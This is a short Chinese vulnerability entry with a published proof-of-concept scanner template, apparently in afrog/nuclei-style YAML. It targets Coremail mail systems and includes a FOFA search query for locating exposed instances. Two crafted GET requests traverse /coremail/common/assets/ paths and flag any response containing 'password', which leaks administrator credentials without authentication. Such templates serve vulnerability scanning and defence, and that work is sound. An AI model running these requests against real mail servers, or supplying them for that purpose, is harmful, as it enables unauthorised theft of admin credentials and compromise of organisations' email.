漏洞描述
FOFA: app="Coremail专业邮件系统"
coremail-manager-password-disclosure: Coremail 邮件系统未授权访问获取管理员账密
PoC代码[已公开]
id: coremail-manager-password-disclosure
info:
name: Coremail 邮件系统未授权访问获取管理员账密
author: zan8in
severity: high
verified: false
description: |
FOFA: app="Coremail专业邮件系统"
tags: coremail,disclosure
created: 2023/09/03
rules:
r0:
request:
method: GET
path: /coremail/common/assets/:/:/:/:/:/:/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
expression: response.status == 200 && response.body.bcontains(b'password')
r1:
request:
method: GET
path: /coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
expression: response.status == 200 && response.body.bcontains(b'password')
expression: r0() || r1()